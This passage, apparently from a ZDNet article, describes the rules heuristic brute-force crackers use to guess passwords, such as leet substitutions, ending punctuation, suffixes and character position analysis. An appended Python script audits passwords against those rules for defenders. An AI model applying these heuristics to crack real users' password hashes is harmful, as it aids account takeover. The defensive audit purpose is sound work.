Ending punctuation (! ? . ,) is expected to be at the end of the password, and we would not expect to see more than one punctuation character. Any other ending punctuation is not accepted.

Suffixes
Accepted suffixes include -able, -ac, -acity, -age, etc. Here is a comprehensive Suffix Worksheet. The rule here is that the last letter before the suffix cannot be the same as the first letter of the suffix. The rule does not allow for repeating vowels.

Vowels
The word needs to contain at least one vowel.

Employing Character Position Analysis, analyzing a character’s position in relation to its neighbors, allows a hacker to know if the characters fit next to each other. There are three tests involved, as well as methods for getting more accurate results and for dealing with more complex characters. This heuristic approach allows hackers to crack long and complicated passwords quicker.

How do we defend against this approach? Well, if you really value your privacy, you had best understand how hackers use brute force attacks to translate a hash into your password, and create passwords of sufficient complexity that will defeat their brute force attacks. Is your organization practicing password common sense? Talk Back and let me know.

Source: Brute Force Attacks: Beyond password basics | ZDNet
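As an added example (not code from the ZDNet article, from Smith's 2600 piece, or from any tool mentioned on this page), the following Python audits a candidate password against the construction rules the article lists: hyphen/underscore-separated words tested one at a time, a single possessive apostrophe, one ending punctuation mark, number-for-vowel substitution and the vowel requirement. A defender can use it to see which passwords fall inside the small space a heuristic cracker searches first, regardless of their length. The word list is a constructed stand-in for a real dictionary file, and the substitutions beyond the article's 4/3/0 are assumptions.

```python
"""Password predictability audit modelled on the heuristic brute-force rules
the article lists. Added example for defenders; not code from the article,
from the 2600 piece or from any tool on the page."""
import re

# Constructed sample dictionary (assumption: a real audit loads a full word list).
WORDS = {"password", "secret", "monkey", "dragon", "letmein", "welcome", "summer"}

# Reverse the substitutions the article names (4=A, 3=E, 0=O) plus a few
# equally common ones (assumption: 1=I, @=A, $=S, 5=S).
LEET = str.maketrans({"4": "a", "3": "e", "0": "o", "1": "i", "@": "a", "$": "s", "5": "s"})
ENDING_PUNCT = "!?.,"
VOWELS = set("aeiou")


def is_dictionary_word(word: str) -> bool:
    """Dictionary lookup with a plural fallback ("dragons" -> "dragon")."""
    return word in WORDS or (word.endswith("s") and word[:-1] in WORDS)


def strip_ending_punct(password: str):
    """Ending-punctuation rule: at most one of ! ? . , and only as the final
    character. Returns (core, matched); two trailing marks do not match."""
    if password and password[-1] in ENDING_PUNCT and not (
        len(password) > 1 and password[-2] in ENDING_PUNCT
    ):
        return password[:-1], True
    return password, False


def strip_possessive(token: str):
    """Apostrophe rule: a single apostrophe plus 's' at the last or
    second-to-last position (dragon's, dragons'). Returns (base, matched)."""
    if token.endswith("'s"):
        return token[:-2], True
    if token.endswith("s'"):
        return token[:-1], True
    return token, False


def audit(password: str) -> dict:
    """Report which construction rules explain the password. A password fully
    explained by them sits in the space a heuristic cracker tries first,
    however long it is."""
    core, ending = strip_ending_punct(password)
    # Hyphen/underscore rule: separators split independent words, each tested alone.
    tokens = [t for t in re.split(r"[-_]", core.lower()) if t]
    apostrophe = leet = False
    dictionary_hits = 0
    for tok in tokens:
        base, possessive = strip_possessive(tok)
        apostrophe = apostrophe or possessive
        plain = is_dictionary_word(base)
        decoded = is_dictionary_word(base.translate(LEET))
        if decoded and not plain:
            leet = True  # the word only appears once the substitutions are undone
        dictionary_hits += int(plain or decoded)
    # Vowel rule: the decoded form must contain at least one vowel.
    has_vowel = any(c in VOWELS for c in core.lower().translate(LEET))
    return {
        "words": len(tokens),
        "dictionary_words": dictionary_hits,
        "ending_punctuation": ending,
        "apostrophe": apostrophe,
        "leet_substitution": leet,
        "has_vowel": has_vowel,
        "predictable": bool(tokens) and dictionary_hits == len(tokens),
    }


def heuristic_candidates(dictionary_size: int) -> int:
    """Rough size of the space the rules above describe for one-word passwords:
    each word plain or in one leet spelling, with or without a possessive
    form, with one of the accepted ending marks or none. A simplified model
    (assumption), meant only to contrast with exhaustive brute force."""
    return dictionary_size * 2 * 2 * (1 + len(ENDING_PUNCT))


if __name__ == "__main__":
    for candidate in ("P4ssw0rd!", "monkey-dragon's", "xq7Rz!!"):
        print(candidate, audit(candidate))
    print("heuristic candidates for the sample dictionary:", heuristic_candidates(len(WORDS)))
```

A "predictable" result means every component of the password was reached by the rules alone, so "P4ssw0rd!" scores the same as "password" despite the policy-satisfying digits and punctuation, while the random-looking "xq7Rz!!" matches none of them. Swap in a real word list and the per-rule flags show which habits a password policy should actively discourage rather than reward.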